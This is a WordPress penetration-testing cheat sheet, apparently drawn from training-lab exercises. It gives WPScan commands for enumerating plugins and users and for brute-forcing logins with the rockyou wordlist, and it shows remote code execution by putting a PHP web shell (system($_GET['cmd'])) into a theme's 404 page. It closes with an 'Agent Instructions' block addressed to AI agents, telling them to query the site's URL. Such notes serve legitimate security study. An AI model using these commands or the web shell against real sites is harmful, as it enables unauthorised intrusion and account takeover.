# Wordpress Pentesting

## WordPress Structure

```php
.
├── index.php
├── license.txt
├── readme.html
├── wp-activate.php
├── wp-admin
├── wp-blog-header.php
├── wp-comments-post.php
├── wp-config.php
├── wp-config-sample.php
├── wp-content
├── wp-cron.php
├── wp-includes
├── wp-links-opml.php
├── wp-load.php
├── wp-login.php
├── wp-mail.php
├── wp-settings.php
├── wp-signup.php
├── wp-trackback.php
└── xmlrpc.php
```

## WordPress User Roles

***

There are five types of users in a standard WordPress installation.

| Role          | Description                                                                                                                                            |
| ------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------ |
| Administrator | This user has access to administrative features within the website. This includes adding and deleting users and posts, as well as editing source code. |
| Editor        | An editor can publish and manage posts, including the posts of other users.                                                                            |
| Author        | Authors can publish and manage their own posts.                                                                                                        |
| Contributor   | These users can write and manage their own posts but cannot publish them.                                                                              |
| Subscriber    | These are normal users who can browse posts and edit their profiles.                                                                                   |

## WPScan

### Basic Scan

```
wpscan --url http://127.0.0.1
```

### Enumerate Plugins using WPScan

```bash
 wpscan --url http://94.237.49.182:58555/ --enumerate ap
```

### Enumerate Users using WPScan

```bash
wpscan --url http://94.237.49.182:58555/ --enumerate u
```

### WPScan Aggressive Mode Plugins

```python
wpscan --url http://blog.inlanefreight.local -e ap --no-banner --plugins-detection aggressive --plugins-version-detection aggressive --max-threads 60

```

### ALL in ONE WPSCAN Command

```python
wpscan --url target.com --disable-tls-checks --api-token <api-token> -e at -e ap -e u --enumerate ap --plugins-detection aggressive --force
```

### Normal WPSCAN Bruteforce Attack

```python
wpscan --url http://example.com --passwords /usr/share/wordlists/rockyou.txt
```

### &#x20;

### BruteForce attack using WPScan

WPScan can be used to brute force usernames and passwords. The scan report returned three users registered on the website: `admin`, `roger`, and `david`. The tool uses two kinds of login brute force attacks, `xmlrpc` and `wp-login`. The `wp-login` method will attempt to brute force the normal WordPress login page, while the `xmlrpc` method uses the WordPress API to make login attempts through `/xmlrpc.php`. The `xmlrpc` method is preferred as it is faster.

```python
wpscan --password-attack xmlrpc -t 20 -U admin, david -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.com
```

<figure><img src="/files/XbJljRTrp6gNKNhfi5Gc" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/JIvtT6nr3ALDkmUrSnu5" alt=""><figcaption></figcaption></figure>

## RCE using ThemeEditor

we need to login as Administrator on WordPress Portal, then you need to go to theme editor page

edit the **404 theme** and add the reverse shell in it

<figure><img src="/files/SzGBqbnZtjJKK0pVJdtE" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/uXl8lIVWB572XrGHdz4g" alt=""><figcaption></figcaption></figure>

or you can also add the below code as well

```php
<?php
system($_GET['cmd']);
?>
```

<figure><img src="/files/kSrbM6a3R6ZUKqqo6nND" alt=""><figcaption></figcaption></figure>

now save it and visit the below url to access it and execute it

```
http://<target>/wp-content/themes/twentyseventeen/404.php
```

<figure><img src="/files/CuVjEpH6ZmUqcG3FzLkZ" alt=""><figcaption></figcaption></figure>

and we have successfull RCE.

## XMLRPC.php&#x20;

It is important to note that `xmlrpc.php` being enabled on a WordPress instance is not a vulnerability. Depending on the methods allowed `xmlrpc.php` can facilitate some enumeration and exploitation activities, though.

if we have a username and password for the admin user we can try to get the information utilizing the xmlrpc.php&#x20;

```bash
curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>" http://blog.inlanefreight.com/xmlrpc.php
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.programmersecurity.com/cms-pentesting/wordpress-pentesting.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.